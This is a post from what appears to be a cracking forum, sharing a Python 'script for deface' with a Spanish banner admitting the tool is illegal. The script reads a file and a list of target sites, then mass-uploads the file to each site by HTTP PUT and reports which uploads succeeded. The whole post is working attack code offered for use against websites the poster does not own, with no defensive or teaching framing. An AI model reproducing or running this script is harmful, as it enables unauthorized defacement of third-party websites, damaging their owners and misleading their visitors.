script for deface | Web Scripts | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

script for deface

script for deface

LV
1
 

p4ox6gov

Member
Joined
Dec 7, 2023
Threads
5
Likes
2
Awards
3
Credits
1,680©
Cash
0$
#-*- coding: utf-8 -*-

try:
import requests
import os.path
import sys
except ImportError:
exit("instalate los requisitos capullo ...")

banner = """


/\ \ /\ \ /\_\/\_\ _
/ \ \ \ \ \ / / / / //\_\
/ /\ \ \ /\ \_\ /\ \/ \ \/ / / Autor : p4ox6.gov
/ / /\ \_\ / /\/_// \____\__/ / fecha : Unknow bro
/ / /_/ / / / / / / /\/________/ Tools : deface web
/ / /__\/ / / / / / / /\/_// / / IG : unknow
/ / /_____/ / / / / / / / / /
/ / /\ \ \ ___/ / /__/ / / / / /
/ / / \ \ Y\__\/_/___\/_/ / / /
\/_/ \_\|/_________/ \/_/

Esta herramienta es illegal !!


"""

b = '\033[31m'
h = '\033[32m'
m = '\033[00m'

def x(tetew):
ipt = ''
if sys.version_info.major > 2:
ipt = input(tetew)
else:
ipt = raw_input(tetew)

return str(ipt)

def aox(script,target_file="webs.txt"):
op = open(script,"r").read()
with open(target_file, "r") as target:
target = target.readlines()
s = requests.Session()
print("uploading file to %d website"%(len(target)))
for web in target:
try:
site = web.strip()
if site.startswith("http://") is False:
site = "http://" + site
req = s.put(site+"/"+script,data=op)
if req.status_code < 200 or req.status_code >= 250:
print(m+"["+b+" FAILED!"+m+" ] %s/%s"%(site,script))
else:
print(m+"["+h+" SUCCESS"+m+" ] %s/%s"%(site,script))

except requests.exceptions.RequestException:
continue
except KeyboardInterrupt:
print; exit()

def main(__bn__):
print(__bn__)
while True:
try:
a = x("Archivo: ")
if not os.path.isfile(a):
print("error archivo no encontrado capullo %s "%(a))
continue
else:
break
except KeyboardInterrupt:
print; exit()

aox(a)

if __name__ == "__main__":
main(banner)
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Similar threads

Top Bottom